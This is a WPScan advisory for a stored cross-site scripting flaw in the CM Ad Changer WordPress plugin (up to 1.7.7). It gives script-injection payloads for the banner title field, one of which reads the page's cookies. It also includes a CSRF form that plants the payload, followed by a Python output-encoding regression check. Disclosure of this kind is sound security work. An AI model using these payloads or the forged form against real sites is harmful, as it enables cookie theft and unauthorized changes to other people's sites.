CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)



Description
A stored cross-site scripting (XSS) vulnerability was reported by the author to CM Ad Plugins. An unprivileged user can trigger the stored XSS to perform malicious actions, or an attacker can send a crafted link (CSRF) that triggers the stored XSS.
Proof of Concept
1) Go to CM Ad Changer -> Campaigns

2) Create a campaign. Enter whatever you want in Campaign settings. In the next tab, "Campaign Banners", select an image in Campaign images, and in Banner Title enter this payload:
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Click Save. The payload triggers every time you return.

An attacker can create a payload file containing the following:

<html>
 
  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will trigger stored XSS through the banner_title parameter.
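A regression check for the banner_title sink, as an added example (not the plugin's code or the vendor's 1.7.8 fix): it renders the two payloads above with and without per-context output encoding and counts the script elements an HTML tokenizer sees. The two output templates and the names `render_unsafe`, `render_safe` and `js_string` are assumptions about how a stored title might be echoed.

```python
import html
import json
from html.parser import HTMLParser

# The two payloads from the proof of concept above.
PAYLOADS = [
    "</script><script>confirm(/aaditya/)</script>",
    "</script><script>confirm(document.cookie)</script>",
]

def render_unsafe(title):
    # Assumed vulnerable pattern: the stored title is echoed verbatim
    # into element text and into an inline script string.
    return ('<td class="banner-title">' + title + "</td>"
            + '<script>var bannerTitle = "' + title + '";</script>')

def js_string(value):
    # JSON-encode, then escape the characters the HTML parser acts on
    # inside <script>, so "</script>" can never end the element early.
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out

def render_safe(title):
    # Encode per sink: HTML-escape for element text, JS string for script.
    return ('<td class="banner-title">' + html.escape(title) + "</td>"
            + "<script>var bannerTitle = " + js_string(title) + ";</script>")

class ScriptCounter(HTMLParser):
    """Counts <script> start tags the way an HTML tokenizer sees them."""
    def __init__(self):
        super().__init__()
        self.scripts = 0
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

def injected_scripts(render, title):
    # Both templates contain exactly one <script> of their own;
    # anything beyond that came from the stored title.
    parser = ScriptCounter()
    parser.feed(render(title))
    parser.close()
    return parser.scripts - 1

if __name__ == "__main__":
    for p in PAYLOADS:
        print(injected_scripts(render_unsafe, p), injected_scripts(render_safe, p))
```

Encoding on output complements input validation and a per-request anti-CSRF token on the campaign form, which is what stops the auto-submitting page above from writing the title in the first place.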

Affects Plugin

Fixed in version 1.7.8

References

URL https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Aaditya Purani
Submitter Website https://aadityapurani.com
Submitter Twitter aaditya_purani
Views 211
Verified No
WPVDB ID 8514

Timeline

Publicly Published 2016-06-09 (over 2 years ago)
Added 2016-06-13 (over 2 years ago)
Last Updated 2016-06-13 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.